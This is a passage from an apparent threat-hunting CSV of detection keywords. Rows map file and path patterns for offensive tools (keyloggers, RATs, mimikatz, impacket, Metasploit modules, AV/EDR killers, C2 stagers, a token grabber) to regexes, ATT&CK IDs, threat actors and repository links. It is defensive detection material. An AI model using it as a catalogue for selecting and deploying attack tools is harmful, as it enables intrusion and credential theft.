Escalation","https://github.com/floesen/KExecDD","1","1","N/A","N/A","8","3","244","41","2024-04-19T09:58:14Z","2024-04-19T08:54:49Z","8338" "*/KeyCredentialLink.git*",".{0,1000}\/KeyCredentialLink\.git.{0,1000}","offensive_tool_keyword","KeyCredentialLink","Add Shadow Credentials to a target object by editing their msDS-KeyCredentialLink attribute","T1098 - T1550","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/KeyCredentialLink","1","1","N/A","N/A","10","1","21","3","2024-06-05T13:44:39Z","2024-06-05T13:19:49Z","8339" "*/KeyCredentialLink.ps1*",".{0,1000}\/KeyCredentialLink\.ps1.{0,1000}","offensive_tool_keyword","KeyCredentialLink","Add Shadow Credentials to a target object by editing their msDS-KeyCredentialLink attribute","T1098 - T1550","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/KeyCredentialLink","1","1","N/A","N/A","10","1","21","3","2024-06-05T13:44:39Z","2024-06-05T13:19:49Z","8340" "*/keylistattack.py*",".{0,1000}\/keylistattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","8342" "*/keylog.exe*",".{0,1000}\/keylog\.exe.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","1","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","8343" "*/keylog.php*",".{0,1000}\/keylog\.php.{0,1000}","offensive_tool_keyword","BlackShades","remote access trojan (RAT) used by attackers to gain unauthorized control over a victim's computer","T1012 - T1059.001 - T1071.001 - T1105 - T1113 - T1125","TA0003 - TA0005 - TA0008 - TA0010 - TA0011","N/A","N/A","Malware","https://github.com/yuankong666/Ultimate-RAT-Collection/tree/main/BlackShades","1","1","N/A","N/A","10","10","2468","431","2025-04-15T16:14:10Z","2023-09-12T00:41:11Z","8344" "*/KeyLogger.ahk*",".{0,1000}\/KeyLogger\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - 
TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","8345" "*/keylogger.cpp*",".{0,1000}\/keylogger\.cpp.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","N/A","10","10","159","44","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z","8346" "*/KeyLogger.cs*",".{0,1000}\/KeyLogger\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","8347" "*/Keylogger.dll*",".{0,1000}\/Keylogger\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","8348" "*/keylogger.exe*",".{0,1000}\/keylogger\.exe.{0,1000}","offensive_tool_keyword","keylogger","Keyboard recording","T1056.001","TA0006 - 
TA0009","N/A","N/A","Collection","https://github.com/uknowsec/keylogger","1","1","N/A","N/A","9","2","140","35","2021-05-19T08:33:58Z","2020-11-10T07:15:50Z","8349" "*/keylogger.exe*",".{0,1000}\/keylogger\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","N/A","10","10","159","44","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z","8350" "*/keylogger.git*",".{0,1000}\/keylogger\.git.{0,1000}","offensive_tool_keyword","keylogger","Keyboard recording","T1056.001","TA0006 - TA0009","N/A","N/A","Collection","https://github.com/uknowsec/keylogger","1","1","N/A","N/A","9","2","140","35","2021-05-19T08:33:58Z","2020-11-10T07:15:50Z","8351" "*/keylogger/*.*",".{0,1000}\/keylogger\/.{0,1000}\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","8352" "*/keyscan.go*",".{0,1000}\/keyscan\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","8353" "*/keywa7/releases/download/*",".{0,1000}\/keywa7\/releases\/download\/.{0,1000}","offensive_tool_keyword","keywa7","The tool that bypasses the firewall's Application Based Rules and lets you connect to anywhere","T1090.001 - T1071.004 - T1071.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/keywa7/keywa7","1","1","N/A","N/A","6","1","61","9","2024-08-19T08:09:33Z","2024-08-05T15:27:26Z","8354" "*/KidLogger.app/*",".{0,1000}\/KidLogger\.app\/.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","8355" "*/kidlogger.desktop*",".{0,1000}\/kidlogger\.desktop.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","8356" "*/Kill_protector.py*",".{0,1000}\/Kill_protector\.py.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - 
TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","1","N/A","N/A","10","","N/A","","","","8357" "*/killav.*",".{0,1000}\/killav\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8358" "*/KillAV.exe*",".{0,1000}\/KillAV\.exe.{0,1000}","offensive_tool_keyword","Burntcigar KillAV","Scans for process names linked to known antivirus or EDR products - then adds their process IDs to a stack for later termination - often used by attackers","T1089 - T1489 - T1562","TA0005","KillAV","Cuba","Malware","https://www.virustotal.com/gui/file/aeb044d310801d546d10b247164c78afde638a90b6ef2f04e1f40170e54dec03?nocache=1","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","8359" "*/killav.py*",".{0,1000}killav\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. 
or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","8360" "*/killav.rb*",".{0,1000}\/killav\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8361" "*/Killchain.ps1*",".{0,1000}\/Killchain\.ps1.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","1","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","8362" "*/KillDefenderBOF*",".{0,1000}\/KillDefenderBOF.{0,1000}","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","1","N/A","N/A","10","3","224","30","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z","8363" "*/killer.exe*",".{0,1000}\/killer\.exe.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","1","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","8364" "*/Killer.git*",".{0,1000}\/Killer\.git.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/0xHossam/Killer","1","1","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","8365" "*/KillEvenlogService.ps1*",".{0,1000}\/KillEvenlogService\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8366" "*/KillEvenlogService.ps1*",".{0,1000}\/KillEvenlogService\.ps1.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","1","N/A","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","8367" "*/kimi.py*",".{0,1000}\/kimi\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","8369" "*/kintercept.py*",".{0,1000}\/kintercept\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","8370" "*/Kirby.ps1*",".{0,1000}\/Kirby\.ps1.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","1","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","8371" "*/kismet*",".{0,1000}\/kismet.{0,1000}","offensive_tool_keyword","kismet","Kismet is a wireless network and device detector. sniffer. wardriving tool. 
and WIDS (wireless intrusion detection) framework.","T1016 - T1040 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/kismetwireless/kismet","1","0","#linux","N/A","N/A","10","1711","316","2025-04-16T21:06:48Z","2016-09-20T13:26:00Z","8372" "*/kismetwireless/*",".{0,1000}\/kismetwireless\/.{0,1000}","offensive_tool_keyword","kismet","Kismet is a wireless network and device detector. sniffer. wardriving tool. and WIDS (wireless intrusion detection) framework.","T1016 - T1040 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/kismetwireless/kismet","1","1","N/A","N/A","N/A","10","1711","316","2025-04-16T21:06:48Z","2016-09-20T13:26:00Z","8373" "*/kitrap0d.*",".{0,1000}\/kitrap0d\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8374" "*/kittens/haloKitten*",".{0,1000}\/kittens\/haloKitten.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","8375" "*/kittens/recycleKitten*",".{0,1000}\/kittens\/recycleKitten.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","8376" "*/KittyStager/*",".{0,1000}\/KittyStager\/.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","8377" "*/kiwi.rb*",".{0,1000}\/kiwi\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8378" "*/kiwi_passwords.yar*",".{0,1000}\/kiwi_passwords\.yar.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8379" "*/klezVirus/CandyPotato*",".{0,1000}\/klezVirus\/CandyPotato.{0,1000}","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. 
This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","Volatile Cedar","Exploitation tool","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","N/A","4","306","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z","8380" "*/klg.ps1*",".{0,1000}\/klg\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","8381" "*/knowsmore.cmd*",".{0,1000}\/knowsmore\.cmd.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","8382" "*/knowsmore.db*",".{0,1000}\/knowsmore\.db.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","8383" "*/knowsmore.git*",".{0,1000}\/knowsmore\.git.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - 
T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","1","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","8384" "*/knowsmore.py*",".{0,1000}\/knowsmore\.py.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","1","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","8385" "*/knqyf263/CVE-2022-0847*",".{0,1000}\/knqyf263\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/knqyf263/CVE-2022-0847","1","1","N/A","N/A","N/A","1","47","9","2022-03-08T13:54:08Z","2022-03-08T13:48:55Z","8386" "*/knx-gateway-discover.nse*",".{0,1000}\/knx\-gateway\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8387" "*/knx-gateway-info.nse*",".{0,1000}\/knx\-gateway\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8388" "*/Koadic*",".{0,1000}\/Koadic.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY 